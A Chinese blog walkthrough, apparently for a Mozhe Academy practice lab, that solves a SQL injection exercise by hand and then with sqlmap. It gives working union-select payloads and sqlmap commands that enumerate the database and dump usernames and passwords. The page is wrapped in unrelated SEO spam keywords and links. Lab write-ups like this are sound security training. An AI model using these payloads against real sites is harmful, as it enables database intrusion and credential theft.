当前位置: 首页 > news >正文

南皮县做网站价格三明网站优化

news 2025/10/7 2:23:42
南皮县做网站价格,三明网站优化,阜新网站建设单位,wordpress args1. 墨者学院:SQL过滤字符后手工注入漏洞测试(第3题)🚀 因为练习过太多的sql注入,废话不多介绍,我会通过围绕手动注入和工具爆破的方式达到靶场目标,开练!!! 2. 手工注入方式&#x1…

1. 墨者学院:SQL过滤字符后手工注入漏洞测试(第3题)🚀

因为练习过太多的sql注入,废话不多介绍,我会通过围绕手动注入和工具爆破的方式达到靶场目标,开练!!!

2. 手工注入方式🎯

测试从"http://124.70.71.251:43066/new_list.php?"开始,以自己的靶场地址为准。

2.1 确定字段数⚡

常见注入点:id=1 and 1=2,id=1'id=1"等等,本次靶场是单引号闭合。

id=1' order by 8--+

':单引号用于闭合SQL语句中的字符串
order by:用于确定查询结果集的列数 ,字段max=7
--+:注释掉后续SQL语句,避免语法错误

[截图位置]

2.2 确认显示位⚡

id=-1' union select 1,2,3,4,5,6,7--+

union select:联合查询,用于显示可回显的字段位置
-1:确保原查询不返回结果,只显示union select的结果

[截图位置]

2.3 获取基本信息⚡

id=-1' union select 1,database(),version(),user(),5,6,7--+

database():获取当前数据库名称
version():获取数据库版本信息
user():获取当前数据库用户

[截图位置]

2.4 获取表名⚡

id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema='min_ju4t_mel1i'--+

information_schema.tables:系统表,存储所有表信息
group_concat():将多行结果合并为一行
table_schema:指定数据库名称

[截图位置]

2.5 获取列名⚡

id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}'--+

information_schema.columns:系统表,存储所有列信息
table_name:指定要查询的表名

[截图位置]

2.6 获取数据⚡

id=-1' union select 1,group_concat(username),group_concat(password),4,5,6,7 from `(@dmin9_td4b}`--+

username,password:目标表的敏感字段
反引号`:用于包裹特殊表名

[截图位置]

3. sqlmap工具测试🎯

3.1 获取所有数据库⚡

python sqlmap.py -u "http://124.70.64.48:43983/new_list.php?id=1" --dbs --batch

--dbs:枚举所有数据库
--batch:自动选择默认选项

[截图位置]

3.2 获取指定数据库的表⚡

python sqlmap.py -u "http://124.70.64.48:43983/new_list.php?id=1" -D min_ju4t_mel1i --tables --batch

-D:指定数据库
--tables:枚举指定数据库的所有表

[截图位置]

3.3 获取表的列⚡

python sqlmap.py -u "http://124.70.64.48:43983/new_list.php?id=1" -D min_ju4t_mel1i -T (@dmin9_td4b} --columns --batch

-T:指定表名
--columns:枚举指定表的所有列

[截图位置]

3.4 导出数据⚡

python sqlmap.py -u "http://124.70.64.48:43983/new_list.php?id=1" -D min_ju4t_mel1i -T (@dmin9_td4b} -C id,username,password,status --dump --batch

-C:指定要导出的列
--dump:导出指定表的数据

[截图位置]

3.5 清理缓存⚡

python sqlmap.py --purge

--purge:清除sqlmap缓存文件
该指令用于清除sqlmap的缓存,因为重启靶场,端口会发生变化,可能获取到的password是之前的数据,详细的sqlmap指令获取如下:

python sqlmap.py -h

4. 总结🏁

本次测试通过手工注入和sqlmap工具两种方式完成了SQL注入漏洞测试:

  1. 手工注入需要逐步构造payload,理解SQL语法
  2. sqlmap自动化程度高,但需要正确使用参数
  3. 目标网站存在明显的SQL注入漏洞,建议修复
  4. 特殊字符过滤不彻底,导致注入成功

声明:本文仅用于安全学习,严禁非法测试! ❗❗❗

http://www.dtcms.com/a/448776.html

相关文章:

  • 网站推广策划方案的主要内容?outlook企业邮箱
  • 免费做手机网站建设汽车网站代码
  • 网站分享到朋友圈代码小红书推广平台有哪些
  • 象山网站优化公司建设网站开发方案
  • 做网站建设公司crm在线广东的一起做网站
  • 相册特效手机网站阿里云虚拟主机多网站
  • 电商网站活动推广门户网站建设工作管理办法
  • 免费网站推广渠道怎样给自己的店做网站
  • 音乐盒网站源码树莓派wordpress
  • 网站更换目录名如何做301跳转新人如何自学做网站
  • 邹城网站定制公司域名备案怎么弄
  • 建设学校网站中山市路桥建设有限公司网站
  • 做一个网站大概要多少钱做搬家服务网站问卷调查结果
  • 宿州网站建设开发公司哪家好在百度云上做网站
  • 贵州住房和城乡建设厅网站朗朗上口的广告公司名称
  • 国际婚恋网站做翻译合法吗网站开发的技术风险
  • 怎样做网站系统福州网站建设费用
  • 哔哩哔哩网站免费进入seo关键词优化推广价格
  • 做坏事网站大气个人网站源码
  • 中国建设局网站首页爱站网ip反域名查询
  • 怎么用记事本做网站企业网站整合
  • 图片网站源码网站营销的优缺点
  • 网站建设专业输入法17网一起做网店广州货源网
  • 动态购物网站开发源代码wordpress 点击文章
  • 网站内页标题修改前端做网站直播
  • 网站后续建设外贸 国外推广网站
  • 外管局网站先支后收怎么做报告怎样做网站导购
  • 医院管理系统网站模板广州免费景点
  • 网站开发设计中的收获企业网站建设对网络营销的影响主要表现在( )
  • 用自己的电脑做服务器搭建网站局域网网站建设的步骤过程